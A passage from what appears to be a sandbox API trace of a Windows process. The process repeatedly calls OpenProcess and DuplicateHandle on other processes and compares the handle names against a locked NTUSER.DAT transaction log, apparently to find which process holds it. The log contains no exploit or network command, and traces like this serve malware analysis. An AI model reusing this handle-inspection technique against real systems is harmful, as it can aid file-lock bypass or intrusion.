dwProcessId=0x930) returned 0x1e8 [0163.458] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.458] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.459] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.460] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.460] CloseHandle (hObject=0x1e4) returned 1 [0163.460] _wcsicmp (_Str1="\\Microsoft Analysis Services", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0163.460] CloseHandle (hObject=0x194) returned 1 [0163.460] CloseHandle (hObject=0x1e8) returned 1 [0163.460] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x940) returned 0x1e8 [0163.460] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.461] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.461] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.464] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.464] CloseHandle (hObject=0x1e4) returned 1 [0163.464] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.464] CloseHandle (hObject=0x194) returned 1 [0163.464] CloseHandle (hObject=0x1e8) returned 1 [0163.464] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x940) returned 0x1e8 [0163.464] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.464] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.465] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.466] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.466] CloseHandle (hObject=0x1e4) returned 1 [0163.466] _wcsicmp (_Str1="\\Windows Sidebar", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.466] CloseHandle (hObject=0x194) returned 1 [0163.466] CloseHandle (hObject=0x1e8) returned 1 [0163.466] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x950) returned 0x1e8 [0163.466] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.466] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.467] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.467] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.467] CloseHandle (hObject=0x1e4) returned 1 [0163.468] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.468] CloseHandle (hObject=0x194) returned 1 [0163.468] CloseHandle (hObject=0x1e8) returned 1 [0163.468] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x950) returned 0x1e8 [0163.468] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.468] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.469] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.469] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.470] CloseHandle (hObject=0x1e4) returned 1 [0163.470] _wcsicmp (_Str1="\\Windows Journal", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.470] CloseHandle (hObject=0x194) returned 1 [0163.470] CloseHandle (hObject=0x1e8) returned 1 [0163.470] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x960) returned 0x1e8 [0163.470] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.470] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.470] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.471] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.471] CloseHandle (hObject=0x1e4) returned 1 [0163.471] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.471] CloseHandle (hObject=0x194) returned 1 [0163.471] CloseHandle (hObject=0x1e8) returned 1 [0163.472] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x960) returned 0x1e8 [0163.472] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.472] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.473] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.473] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.474] CloseHandle (hObject=0x1e4) returned 1 [0163.474] _wcsicmp (_Str1="\\Microsoft Analysis Services", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0163.474] CloseHandle (hObject=0x194) returned 1 [0163.474] CloseHandle (hObject=0x1e8) returned 1 [0163.474] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x970) returned 0x1e8 [0163.474] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.474] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.475] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.476] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.476] CloseHandle (hObject=0x1e4) returned 1 [0163.476] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.476] CloseHandle (hObject=0x194) returned 1 [0163.476] CloseHandle (hObject=0x1e8) returned 1 [0163.476] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x970) returned 0x1e8 [0163.476] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.476] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.477] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.477] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.477] CloseHandle (hObject=0x1e4) returned 1 [0163.477] _wcsicmp (_Str1="\\Microsoft Analysis Services", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0163.478] CloseHandle (hObject=0x194) returned 1 [0163.478] CloseHandle (hObject=0x1e8) returned 1 [0163.478] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x980) returned 0x1e8 [0163.478] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.478] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.479] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.479] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.480] CloseHandle (hObject=0x1e4) returned 1 [0163.480] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.480] CloseHandle (hObject=0x194) returned 1 [0163.480] CloseHandle (hObject=0x1e8) returned 1 [0163.480] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x980) returned 0x1e8 [0163.480] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.480] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.480] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.481] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.481] CloseHandle (hObject=0x1e4) returned 1 [0163.481] _wcsicmp (_Str1="\\Microsoft Synchronization Services", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0163.481] CloseHandle (hObject=0x194) returned 1 [0163.481] CloseHandle (hObject=0x1e8) returned 1 [0163.481] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x990) returned 0x1e8 [0163.481] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.482] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.485] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.485] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.485] CloseHandle (hObject=0x1e4) returned 1 [0163.486] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.486] CloseHandle (hObject=0x194) returned 1 [0163.486] CloseHandle (hObject=0x1e8) returned 1 [0163.486] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x990) returned 0x1e8 [0163.486] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.486] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.487] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.487] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.488] CloseHandle (hObject=0x1e4) returned 1 [0163.488] _wcsicmp (_Str1="\\Windows Sidebar", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.488] CloseHandle (hObject=0x194) returned 1 [0163.488] CloseHandle (hObject=0x1e8) returned 1 [0163.488] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9a0) returned 0x1e8 [0163.488] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.488] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.489] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.490] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.490] CloseHandle (hObject=0x1e4) returned 1 [0163.490] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.490] CloseHandle (hObject=0x194) returned 1 [0163.490] CloseHandle (hObject=0x1e8) returned 1 [0163.490] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9a0) returned 0x1e8 [0163.490] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.490] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.491] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.491] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.492] CloseHandle (hObject=0x1e4) returned 1 [0163.492] _wcsicmp (_Str1="\\Internet Explorer", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -5 [0163.492] CloseHandle (hObject=0x194) returned 1 [0163.492] CloseHandle (hObject=0x1e8) returned 1 [0163.492] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9b0) returned 0x1e8 [0163.492] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.492] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.493] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.494] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.494] CloseHandle (hObject=0x1e4) returned 1 [0163.494] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.494] CloseHandle (hObject=0x194) returned 1 [0163.494] CloseHandle (hObject=0x1e8) returned 1 [0163.494] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9b0) returned 0x1e8 [0163.494] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.494] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.495] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.496] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.496] CloseHandle (hObject=0x1e4) returned 1 [0163.496] _wcsicmp (_Str1="\\Adobe", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0163.496] CloseHandle (hObject=0x194) returned 1 [0163.496] CloseHandle (hObject=0x1e8) returned 1 [0163.496] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9c0) returned 0x1e8 [0163.496] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.496] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.497] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.498] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.498] CloseHandle (hObject=0x1e4) returned 1 [0163.498] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.498] CloseHandle (hObject=0x194) returned 1 [0163.498] CloseHandle (hObject=0x1e8) returned 1 [0163.498] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9c0) returned 0x1e8 [0163.498] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.498] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.499] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.500] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.500] CloseHandle (hObject=0x1e4) returned 1 [0163.500] _wcsicmp (_Str1="\\Microsoft SQL Server Compact Edition", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0163.500] CloseHandle (hObject=0x194) returned 1 [0163.500] CloseHandle (hObject=0x1e8) returned 1 [0163.500] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9d0) returned 0x1e8 [0163.500] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.501] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.501] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.502] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.502] CloseHandle (hObject=0x1e4) returned 1 [0163.502] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.502] CloseHandle (hObject=0x194) returned 1 [0163.502] CloseHandle (hObject=0x1e8) returned 1 [0163.503] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9d0) returned 0x1e8 [0163.503] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.503] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.503] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.504] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.504] CloseHandle (hObject=0x1e4) returned 1 [0163.504] _wcsicmp (_Str1="\\Microsoft Sync Framework", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0163.504] CloseHandle (hObject=0x194) returned 1 [0163.505] CloseHandle (hObject=0x1e8) returned 1 [0163.505] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9d0) returned 0x1e8 [0163.505] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x7c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.505] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.505] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.506] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.506] CloseHandle (hObject=0x1e4) returned 1 [0163.506] _wcsicmp (_Str1="\\StaticCache.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0163.506] CloseHandle (hObject=0x194) returned 1 [0163.506] CloseHandle (hObject=0x1e8) returned 1 [0163.506] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9e0) returned 0x1e8 [0163.506] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.506] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.509] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.511] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.511] CloseHandle (hObject=0x1e4) returned 1 [0163.511] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.511] CloseHandle (hObject=0x194) returned 1 [0163.511] CloseHandle (hObject=0x1e8) returned 1 [0163.511] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9e0) returned 0x1e8 [0163.511] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.511] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.512] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.513] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.513] CloseHandle (hObject=0x1e4) returned 1 [0163.513] _wcsicmp (_Str1="\\Windows Media Player", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.513] CloseHandle (hObject=0x194) returned 1 [0163.513] CloseHandle (hObject=0x1e8) returned 1 [0163.513] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9e0) returned 0x1e8 [0163.513] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x7c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.513] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.514] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.515] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.515] CloseHandle (hObject=0x1e4) returned 1 [0163.515] _wcsicmp (_Str1="\\StaticCache.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0163.515] CloseHandle (hObject=0x194) returned 1 [0163.515] CloseHandle (hObject=0x1e8) returned 1 [0163.515] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xa0c) returned 0x1e8 [0163.515] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, 